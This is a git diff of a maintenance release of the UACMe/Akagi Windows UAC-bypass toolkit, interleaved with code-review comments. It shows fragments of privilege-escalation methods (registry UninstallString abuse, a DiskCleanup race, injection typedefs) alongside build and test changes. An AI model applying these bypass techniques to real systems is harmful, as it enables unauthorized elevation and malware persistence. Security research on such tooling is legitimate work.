diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe
index f395357..53bd2bf 100644
Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ
diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe
index accfab9..86bb07c 100644
Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ
diff --git a/Compiled/UacInfo64.exe b/Compiled/UacInfo64.exe
index 79c9649..65abf59 100644
Binary files a/Compiled/UacInfo64.exe and b/Compiled/UacInfo64.exe differ
diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc
index facefd9..d8b0ee4 100644
Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ
diff --git a/Source/Akagi/bin/Ikazuchi32.cd b/Source/Akagi/bin/Ikazuchi32.cd
index 97714ea..83a5920 100644
Binary files a/Source/Akagi/bin/Ikazuchi32.cd and b/Source/Akagi/bin/Ikazuchi32.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi64.cd b/Source/Akagi/bin/Ikazuchi64.cd
index 8950769..757c627 100644
Binary files a/Source/Akagi/bin/Ikazuchi64.cd and b/Source/Akagi/bin/Ikazuchi64.cd differ
diff --git a/Source/Akagi/bin/fubuki32.cd b/Source/Akagi/bin/fubuki32.cd
index 3d1e5ba..d34f37d 100644
Binary files a/Source/Akagi/bin/fubuki32.cd and b/Source/Akagi/bin/fubuki32.cd differ
diff --git a/Source/Akagi/bin/fubuki64.cd b/Source/Akagi/bin/fubuki64.cd
index e3b693e..d0b532f 100644
Binary files a/Source/Akagi/bin/fubuki64.cd and b/Source/Akagi/bin/fubuki64.cd differ
diff --git a/Source/Akagi/bin/hibiki32.cd b/Source/Akagi/bin/hibiki32.cd
index 810558c..48b9b6b 100644
Binary files a/Source/Akagi/bin/hibiki32.cd and b/Source/Akagi/bin/hibiki32.cd differ
diff --git a/Source/Akagi/bin/hibiki64.cd b/Source/Akagi/bin/hibiki64.cd
index 0e13bbf..ef6996f 100644
Binary files a/Source/Akagi/bin/hibiki64.cd and b/Source/Akagi/bin/hibiki64.cd differ
diff --git a/Source/Akagi/comet.h b/Source/Akagi/comet.h
index 1bd3967..eb2b6f4 100644
--- a/Source/Akagi/comet.h
+++ b/Source/Akagi/comet.h
@@ -4,9 +4,9 @@
*
* TITLE: COMET.H
*
-* VERSION: 2.52
+* VERSION: 2.57
*
-* DATE: 17 Jan 2017
+* DATE: 07 Mar 2017
*
* Prototypes and definitions for Comet method.
*
@@ -19,5 +19,5 @@
#pragma once
BOOL ucmCometMethod(
- LPWSTR lpszPayload
+ _In_ LPWSTR lpszPayload
);
diff --git a/Source/Akagi/compress.c b/Source/Akagi/compress.c
index 60a9e87..d27735b 100644
--- a/Source/Akagi/compress.c
+++ b/Source/Akagi/compress.c
@@ -4,9 +4,9 @@
*
* TITLE: COMPRESS.C
*
-* VERSION: 2.56
+* VERSION: 2.57
*
-* DATE: 15 Feb 2017
+* DATE: 01 Mar 2017
*
* Compression support.
*
@@ -75,6 +75,12 @@ PUCHAR DecompressBufferLZNT1(
PUCHAR UncompBuffer = NULL;
NTSTATUS status;
+ if (FinalUncompressedSize)
+ *FinalUncompressedSize = 0;
+
+ if (UncompressedBufferSize == 0)
+ return NULL;
+
UncompBuffer = (PUCHAR)VirtualAlloc(NULL, UncompressedBufferSize,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
diff --git a/Source/Akagi/enigma0x3.c b/Source/Akagi/enigma0x3.c
index 1095aa7..783a649 100644
--- a/Source/Akagi/enigma0x3.c
+++ b/Source/Akagi/enigma0x3.c
@@ -4,7 +4,7 @@
*
* TITLE: ENIGMA0X3.C
*
-* VERSION: 2.54
+* VERSION: 2.57
*
* DATE: 07 Feb 2017
*
@@ -256,9 +256,10 @@ BOOL ucmDiskCleanupRaceCondition(
shinfo.lpParameters = T_SCHTASKS_CMD;
shinfo.nShow = SW_SHOW;
if (ShellExecuteExW(&shinfo)) {
- if (shinfo.hProcess)
+ if (shinfo.hProcess != NULL) {
WaitForSingleObject(shinfo.hProcess, INFINITE);
CloseHandle(shinfo.hProcess);
+ }
}
//
// Because cleanmgr.exe is slow we need to wait enough time until it will try to launch dismhost.exe
diff --git a/Source/Akagi/explife.c b/Source/Akagi/explife.c
index 10c29c9..a0c12da 100644
--- a/Source/Akagi/explife.c
+++ b/Source/Akagi/explife.c
@@ -4,9 +4,9 @@
*
* TITLE: EXPLIFE.C
*
-* VERSION: 2.56
+* VERSION: 2.57
*
-* DATE: 14 Feb 2017
+* DATE: 07 Mar 2017
*
* ExpLife UAC bypass using IARPUninstallStringLauncher.
* For description please visit original URL
@@ -100,22 +100,23 @@ BOOL ucmUninstallLauncherMethod(
break;
_strcpy(szKeyName, L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
- StringFromGUID2(&guid, szGuid, sizeof(szGuid));
- _strcat(szKeyName, szGuid);
+ if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
+ _strcat(szKeyName, szGuid);
- lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
- szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
+ lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
+ szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
- if (lResult != ERROR_SUCCESS)
- break;
+ if (lResult != ERROR_SUCCESS)
+ break;
- lResult = RegSetValueEx(hKey, L"UninstallString", 0, REG_SZ, (BYTE*)lpszExecutable,
- (DWORD)(_strlen(lpszExecutable) * sizeof(WCHAR)));
+ lResult = RegSetValueEx(hKey, L"UninstallString", 0, REG_SZ, (BYTE*)lpszExecutable,
+ (DWORD)(_strlen(lpszExecutable) * sizeof(WCHAR)));
- if (lResult != ERROR_SUCCESS)
- break;
+ if (lResult != ERROR_SUCCESS)
+ break;
- bResult = ucmMasqueradedAPRLaunchFile(szGuid);
+ bResult = ucmMasqueradedAPRLaunchFile(szGuid);
+ }
} while (bCond);
diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h
index 94b45aa..414898f 100644
--- a/Source/Akagi/global.h
+++ b/Source/Akagi/global.h
@@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
-* VERSION: 2.55
+* VERSION: 2.57
*
-* DATE: 10 Feb 2017
+* DATE: 28 Feb 2017
*
* Common header file for the program support routines.
*
@@ -79,6 +79,9 @@ typedef enum _UACBYPASSMETHOD {
UacMethodEnigma0x3,
UacMethodEnigma0x3_2,
UacMethodExpLife,
+#ifdef _DEBUG
+ UacMethodTest,
+#endif
UacMethodMax
} UACBYPASSMETHOD;
@@ -101,6 +104,7 @@ typedef enum _UACBYPASSMETHOD {
#include "hybrids.h"
#include "comet.h"
#include "enigma0x3.h"
+#include "tests\test.h"
//default execution flow
#define AKAGI_FLAG_KILO 0
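Review bot: `#include "tests\test.h"` is added unconditionally, while the `UacMethodTest` enum value in the previous hunk and the `case UacMethodTest:` dispatch in main.c are both wrapped in `#ifdef _DEBUG`. As written, the test-only declarations (`ITestInterface`, `UACMeTest`) are pulled into every configuration, and nothing visible here excludes tests/test.c from release builds. Guard the include the same way, `#ifdef _DEBUG` / `#include "tests\test.h"` / `#endif`, and wrap the body of test.c to match, so the debug scaffolding cannot end up in a release binary.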
diff --git a/Source/Akagi/hybrids.c b/Source/Akagi/hybrids.c
index 14a5d06..6e1e9e9 100644
--- a/Source/Akagi/hybrids.c
+++ b/Source/Akagi/hybrids.c
@@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
-* VERSION: 2.56
+* VERSION: 2.57
*
-* DATE: 15 Feb 2017
+* DATE: 01 Mar 2017
*
* Hybrid UAC bypass methods.
*
@@ -1197,12 +1197,18 @@ BOOL ucmSetupAkagiLink(
lpUser = _filename(usKey.Buffer);
+ ParentRoot.Buffer = NULL;
+ ParentRoot.Length = 0;
+ ParentRoot.MaximumLength = 0;
RtlInitUnicodeString(&ParentRoot, L"\\Rpc Control\\Akagi");
InitializeObjectAttributes(&attr, &ParentRoot, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateDirectoryObject(&hRoot, DIRECTORY_CREATE_SUBDIRECTORY, &attr);
if (!NT_SUCCESS(status))
break;
+ ChildName.Buffer = NULL;
+ ChildName.Length = 0;
+ ChildName.MaximumLength = 0;
RtlInitUnicodeString(&ChildName, lpUser);
attr.RootDirectory = hRoot;
attr.ObjectName = &ChildName;
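Review bot: The three field assignments added before each `RtlInitUnicodeString` call do not change behaviour, because that routine writes Buffer, Length and MaximumLength itself. Presumably they are there to quiet code analysis now that the project uses AllRules.ruleset. If so, say it in a comment such as `// zero-init only to satisfy code analysis; RtlInitUnicodeString sets every field`, or use the one-line `RtlSecureZeroMemory(&ParentRoot, sizeof(ParentRoot));` form that tests/test.c in this same commit uses. The same three-line pattern is added for `DllName` in Source/Ikazuchi/dllmain.c. ucmSetupAkagiLink starts and ends outside this hunk.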
diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c
index 4c1bb3d..a8be1f1 100644
--- a/Source/Akagi/main.c
+++ b/Source/Akagi/main.c
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
-* VERSION: 2.56
+* VERSION: 2.57
*
-* DATE: 13 Feb 2017
+* DATE: 28 Feb 2017
*
* Program entry point.
*
@@ -850,6 +850,11 @@ UINT ucmMain()
return ERROR_SUCCESS;
}
break;
+#ifdef _DEBUG
+ case UacMethodTest:
+ UACMeTest();
+ break;
+#endif
}
return ERROR_ACCESS_DENIED;
@@ -902,6 +907,7 @@ VOID main()
uctx.ucmMain = (pfnEntryPoint)ucmMain;
RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
+#pragma warning(suppress: 28159)
k = ~GetTickCount();
g_ExCookie = RtlRandomEx(&k);
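Review bot: `#pragma warning(suppress: 28159)` is added with no comment saying why the warning does not apply, so a later reader cannot tell a deliberate decision from a silenced finding. Put the reason on the line above, for example `// 28159 (GetTickCount wraps): value is only a seed for RtlRandomEx, wraparound is harmless`, if that is indeed the reasoning. The `#pragma warning(suppress: 28301)` added above the `pfnWaitForSingleObject` typedef in sirefef.h needs the same one-line justification. main's body continues outside this hunk.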
diff --git a/Source/Akagi/sirefef.h b/Source/Akagi/sirefef.h
index 3a1b0af..e9c01a9 100644
--- a/Source/Akagi/sirefef.h
+++ b/Source/Akagi/sirefef.h
@@ -4,9 +4,9 @@
*
* TITLE: SIREFEF.H
*
-* VERSION: 2.53
+* VERSION: 2.57
*
-* DATE: 18 Jan 2017
+* DATE: 01 Mar 2017
*
* Prototypes and definitions for Sirefef/ZeroAccess method.
*
@@ -57,6 +57,7 @@ typedef HANDLE(NTAPI *pfnCreateRemoteThread)(
_Out_opt_ LPDWORD lpThreadId
);
+#pragma warning(suppress: 28301)
typedef DWORD(WINAPI *pfnWaitForSingleObject)(
_In_ HANDLE hHandle,
_In_ DWORD dwMilliseconds
diff --git a/Source/Akagi/tests/test.c b/Source/Akagi/tests/test.c
new file mode 100644
index 0000000..2bc62a2
--- /dev/null
+++ b/Source/Akagi/tests/test.c
@@ -0,0 +1,190 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: TEST.C
+*
+* VERSION: 2.57
+*
+* DATE: 28 Feb 2017
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+
+#define T_REGISTRY_USER L"\\REGISTRY\\USER\\"
+#define REGISTRY_USER_LENGTH sizeof(T_REGISTRY_USER) - sizeof(WCHAR)
+
+#define T_AKAGI_KEY L"Software\\Akagi"
+#define AKAGI_KEY_LENGTH sizeof(T_AKAGI_KEY) - sizeof(WCHAR)
+
+
+typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
+
+typedef struct _OBJSCANPARAM {
+ PWSTR Buffer;
+ SIZE_T BufferSize;
+} OBJSCANPARAM, *POBJSCANPARAM;
+
+/*
+* supEnumSystemObjects
+*
+* Purpose:
+*
+* Lookup object by name in given directory.
+*
+*/
+NTSTATUS NTAPI supEnumSystemObjects(
+ _In_opt_ LPWSTR pwszRootDirectory,
+ _In_opt_ HANDLE hRootDirectory,
+ _In_ PENUMOBJECTSCALLBACK CallbackProc,
+ _In_opt_ PVOID CallbackParam
+)
+{
+ BOOL cond = TRUE;
+ ULONG ctx, rlen;
+ HANDLE hDirectory = NULL;
+ NTSTATUS status;
+ NTSTATUS CallbackStatus;
+ OBJECT_ATTRIBUTES attr;
+ UNICODE_STRING sname;
+
+ POBJECT_DIRECTORY_INFORMATION objinf;
+
+ if (CallbackProc == NULL) {
+ return STATUS_INVALID_PARAMETER_4;
+ }
+
+ status = STATUS_UNSUCCESSFUL;
+
+ // We can use root directory.
+ if (pwszRootDirectory != NULL) {
+ RtlSecureZeroMemory(&sname, sizeof(sname));
+ RtlInitUnicodeString(&sname, pwszRootDirectory);
+ InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
+ if (!NT_SUCCESS(status)) {
+ return status;
+ }
+ }
+ else {
+ if (hRootDirectory == NULL) {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+ hDirectory = hRootDirectory;
+ }
+
+ // Enumerate objects in directory.
+ ctx = 0;
+ do {
+
+ rlen = 0;
+ status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
+ if (status != STATUS_BUFFER_TOO_SMALL)
+ break;
+
+ objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
+ if (objinf == NULL)
+ break;
+
+ status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
+ if (!NT_SUCCESS(status)) {
+ RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+ break;
+ }
+
+ CallbackStatus = CallbackProc(objinf, CallbackParam);
+
+ RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+
+ if (NT_SUCCESS(CallbackStatus)) {
+ status = STATUS_SUCCESS;
+ break;
+ }
+
+ } while (cond);
+
+ if (hDirectory != NULL) {
+ NtClose(hDirectory);
+ }
+ return status;
+}
+
+/*
+* supDetectObjectCallback
+*
+* Purpose:
+*
+* Comparer callback routine used in objects enumeration.
+*
+*/
+NTSTATUS NTAPI supDetectObjectCallback(
+ _In_ POBJECT_DIRECTORY_INFORMATION Entry,
+ _In_ PVOID CallbackParam
+)
+{
+ SIZE_T BufferSize;
+ POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
+
+ if (Entry == NULL) {
+ return STATUS_INVALID_PARAMETER_1;
+ }
+
+ if (CallbackParam == NULL) {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+
+ if (Entry->Name.Buffer) {
+
+ BufferSize = Entry->Name.Length + sizeof(UNICODE_NULL);
+ Param->Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, BufferSize);
+ if (Param->Buffer) {
+ Param->BufferSize = BufferSize;
+ _strncpy(
+ Param->Buffer, Param->BufferSize / sizeof(WCHAR),
+ Entry->Name.Buffer, Entry->Name.Length / sizeof(WCHAR)
+ );
+ return STATUS_SUCCESS;
+ }
+ }
+ return STATUS_UNSUCCESSFUL;
+}
+
+
+VOID UACMeTest()
+{
+ OBJSCANPARAM Param;
+ NTSTATUS status;
+ LPWSTR lpszParamKey = NULL;
+ SIZE_T memIO;
+
+ ucmSetupAkagiLink();
+
+ Param.Buffer = NULL;
+ Param.BufferSize = 0;
+
+ status = supEnumSystemObjects(L"\\Rpc Control\\Akagi", NULL,
+ supDetectObjectCallback, &Param);
+ if (!NT_SUCCESS(status))
+ return;
+
+
+ if ((Param.Buffer == NULL) || (Param.BufferSize == 0))
+ return;
+
+ memIO = MAX_PATH + Param.BufferSize + REGISTRY_USER_LENGTH + AKAGI_KEY_LENGTH;
+ lpszParamKey = RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, memIO);
+ if (lpszParamKey == NULL)
+ return;
+
+ _strcpy_w(lpszParamKey, T_REGISTRY_USER);
+ _strcat_w(lpszParamKey, Param.Buffer);
+ _strcat_w(lpszParamKey, L"\\");
+ _strcat_w(lpszParamKey, T_AKAGI_KEY);
+
+}
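Review bot: `UACMeTest` never releases the two heap blocks it obtains: `Param.Buffer` (allocated inside `supDetectObjectCallback`) and `lpszParamKey` are both still live at the closing brace, and the early `return` after a failed `lpszParamKey` allocation also drops `Param.Buffer`. Free both on every exit path, e.g. `RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Param.Buffer);` and the same for `lpszParamKey`, and use one of `GetProcessHeap()` or `NtCurrentPeb()->ProcessHeap` throughout the file rather than both. In `supEnumSystemObjects`, the final `NtClose(hDirectory)` also closes a handle that the caller passed in as `hRootDirectory`; only the handle the function opened itself should be closed there. The NULL check on `CallbackProc` returns `STATUS_INVALID_PARAMETER_4` although it is the third parameter, and the banner says "Lookup object by name" while the routine enumerates entries and hands them to the callback.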
diff --git a/Source/Akagi/tests/test.h b/Source/Akagi/tests/test.h
new file mode 100644
index 0000000..27b9c63
--- /dev/null
+++ b/Source/Akagi/tests/test.h
@@ -0,0 +1,95 @@
+#/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: TEST.H
+*
+* VERSION: 2.57
+*
+* DATE: 28 Feb 2017
+*
+* Test unit header file.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+typedef interface ITestInterface ITestInterface;
+
+typedef struct ITestInterfaceVtbl {
+
+ BEGIN_INTERFACE
+
+ HRESULT(STDMETHODCALLTYPE *QueryInterface)(
+ __RPC__in ITestInterface * This,
+ __RPC__in REFIID riid,
+ _COM_Outptr_ void **ppvObject);
+
+ ULONG(STDMETHODCALLTYPE *AddRef)(
+ __RPC__in ITestInterface * This);
+
+ ULONG(STDMETHODCALLTYPE *Release)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method1)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method2)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method3)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method4)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method5)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method6)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method7)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method8)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method9)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method10)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method11)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method12)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method13)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method14)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method15)(
+ __RPC__in ITestInterface * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method16)(
+ __RPC__in ITestInterface * This);
+ END_INTERFACE
+
+} *PITestInterfaceVtbl;
+
+interface ITestInterface
+{
+ CONST_VTBL struct ITestInterfaceVtbl *lpVtbl;
+};
+
+
+VOID UACMeTest();
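Review bot: The first line of the new header reads `#/****…`, so the banner comment hangs off a stray `#`; it appears to compile as a null directive, but it is almost certainly a typo for `/****…` as in the other headers. `VOID UACMeTest();` declares a function with unspecified parameters in C; write `VOID UACMeTest(VOID);` here and in test.c so that a call with arguments is rejected at compile time. `ITestInterface` and its sixteen placeholder `MethodN` slots have no user anywhere in this commit, so either add a one-line comment saying which interface layout the vtable is meant to mirror or hold the declaration back until something uses it.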
diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj
index cede2a3..f078bda 100644
--- a/Source/Akagi/uacme.vcxproj
+++ b/Source/Akagi/uacme.vcxproj
@@ -85,7 +85,7 @@
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
- SecurityRules.ruleset
+ AllRules.ruleset
$(ProjectName)32
true
@@ -94,7 +94,7 @@
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
true
@@ -106,6 +106,7 @@
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
false
+ $(ProjectDir)
Windows
@@ -132,6 +133,7 @@
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
false
+ $(ProjectDir)
Windows
@@ -167,6 +169,7 @@
true
+ $(ProjectDir)
Windows
@@ -207,6 +210,7 @@
true
+ $(ProjectDir)
Windows
@@ -258,6 +262,7 @@
+
@@ -280,6 +285,7 @@
+
diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters
index 6373b4d..bebea7f 100644
--- a/Source/Akagi/uacme.vcxproj.filters
+++ b/Source/Akagi/uacme.vcxproj.filters
@@ -16,6 +16,9 @@
{1caf2f34-af91-46be-aa2e-1893b0be628c}
+
+ {c4fc1dcf-e216-4458-a377-e7203d627128}
+
@@ -99,6 +102,9 @@
minirtl
+
+ testunits
+
@@ -161,6 +167,9 @@
minirtl
+
+ testunits
+
diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user
index ba01da1..cdde024 100644
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@@ -1,19 +1,19 @@
- 4
+ 28
WindowsLocalDebugger
- 10
+ 28
WindowsLocalDebugger
- 26
+ 22
WindowsLocalDebugger
- 16
+ 22
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Fubuki/dll.vcxproj b/Source/Fubuki/dll.vcxproj
index 719a873..fa7305c 100644
--- a/Source/Fubuki/dll.vcxproj
+++ b/Source/Fubuki/dll.vcxproj
@@ -74,6 +74,7 @@
false
SecurityRules.ruleset
$(ProjectName)32
+ false
true
@@ -81,20 +82,23 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
+ false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
true
- SecurityRules.ruleset
+ AllRules.ruleset
$(ProjectName)32
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
+ false
@@ -112,6 +116,7 @@
false
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -135,6 +140,7 @@
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -163,6 +169,7 @@
false
CompileAsC
None
+ $(SolutionDir)
Windows
@@ -178,6 +185,9 @@
No
UseLinkTimeCodeGeneration
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki32.dll
+
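Review bot: The post-build step added here runs `\Utils\StripDebug.exe` against the freshly linked DLL, and as rendered on this page (the element tags are missing) the path starts at the root of the current drive rather than under `$(SolutionDir)`. Which executable runs therefore depends on where the tree is checked out. The tool itself is not part of this diff, so the build would execute a program whose source and hash a reviewer cannot inspect. Anchor the path, e.g. `"$(SolutionDir)Utils\StripDebug.exe"`, and either build the tool from source inside the solution or record its expected hash next to it. The same step is added for the 64-bit Fubuki target and in the Hibiki, Ikazuchi and Naka project files.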
@@ -193,6 +203,7 @@
true
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -205,6 +216,9 @@
export.def
Shell32.lib;%(AdditionalDependencies)
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki64.dll
+
diff --git a/Source/Fubuki/dllmain.c b/Source/Fubuki/dllmain.c
index aab3d6a..1f0c45b 100644
--- a/Source/Fubuki/dllmain.c
+++ b/Source/Fubuki/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.53
+* VERSION: 2.57
*
-* DATE: 18 Jan 2017
+* DATE: 03 Mar 2017
*
* Proxy dll entry point, Fubuki Kai Ni.
*
@@ -29,9 +29,9 @@
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include
-#include "..\Shared\ntos.h"
+#include "shared\ntos.h"
#include
-#include "..\shared\minirtl.h"
+#include "shared\minirtl.h"
#include "unbcl.h"
#include "wbemcomn.h"
diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc
index e099b54..93a1487 100644
Binary files a/Source/Fubuki/version.rc and b/Source/Fubuki/version.rc differ
diff --git a/Source/Hibiki/Hibiki.vcxproj b/Source/Hibiki/Hibiki.vcxproj
index 61217f1..af8bb32 100644
--- a/Source/Hibiki/Hibiki.vcxproj
+++ b/Source/Hibiki/Hibiki.vcxproj
@@ -72,6 +72,7 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
SecurityRules.ruleset
+ false
true
@@ -79,22 +80,25 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
- SecurityRules.ruleset
+ AllRules.ruleset
true
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
true
+ false
@@ -105,6 +109,7 @@
WIN32;_DEBUG;_WINDOWS;_USRDLL;HIBIKI_EXPORTS;%(PreprocessorDefinitions)
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -114,6 +119,10 @@
DllMain
false
+
+
+
+
@@ -124,6 +133,7 @@
WIN32;_DEBUG;_WINDOWS;_USRDLL;HIBIKI_EXPORTS;%(PreprocessorDefinitions)
false
CompileAsC
+ $(SolutionDir)
Windows
@@ -133,6 +143,10 @@
DllMain
false
+
+
+
+
@@ -148,6 +162,7 @@
false
CompileAsC
true
+ $(SolutionDir)
Windows
@@ -160,6 +175,13 @@
true
false
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Hibiki32.dll
+
+
+
+
+
@@ -175,6 +197,7 @@
false
CompileAsC
true
+ $(SolutionDir)
Windows
@@ -187,6 +210,13 @@
true
false
+
+ \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Hibiki64.dll
+
+
+
+
+
diff --git a/Source/Hibiki/dllmain.c b/Source/Hibiki/dllmain.c
index 40f1075..97c3730 100644
--- a/Source/Hibiki/dllmain.c
+++ b/Source/Hibiki/dllmain.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2016
+* (C) COPYRIGHT AUTHORS, 2014 - 2017
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.10
+* VERSION: 2.57
*
-* DATE: 14 Apr 2016
+* DATE: 07 Mar 2017
*
* AVrf entry point, Hibiki Kai Ni.
*
@@ -30,8 +30,8 @@
#include
#include
-#include "..\shared\ntos.h"
-#include "..\shared\minirtl.h"
+#include "shared\ntos.h"
+#include "shared\minirtl.h"
#if (_MSC_VER >= 1900)
diff --git a/Source/Hibiki/version.rc b/Source/Hibiki/version.rc
index 996f50c..ebac093 100644
Binary files a/Source/Hibiki/version.rc and b/Source/Hibiki/version.rc differ
diff --git a/Source/Ikazuchi/Ikazuchi.vcxproj b/Source/Ikazuchi/Ikazuchi.vcxproj
index 9712183..561e66b 100644
--- a/Source/Ikazuchi/Ikazuchi.vcxproj
+++ b/Source/Ikazuchi/Ikazuchi.vcxproj
@@ -75,6 +75,7 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
SecurityRules.ruleset
+ false
true
@@ -82,20 +83,23 @@
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
- SecurityRules.ruleset
+ AllRules.ruleset
+ false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
- SecurityRules.ruleset
+ AllRules.ruleset
+ false
@@ -109,6 +113,7 @@
false
CompileAsC
MultiThreadedDLL
+ $(SolutionDir)
Windows
@@ -130,6 +135,7 @@
false
CompileAsC
MultiThreadedDLL
+ $(SolutionDir)
Windows
@@ -154,6 +160,7 @@
false
CompileAsC
MultiThreadedDLL
+ $(SolutionDir)
Windows
@@ -165,6 +172,9 @@
true
export.def
+
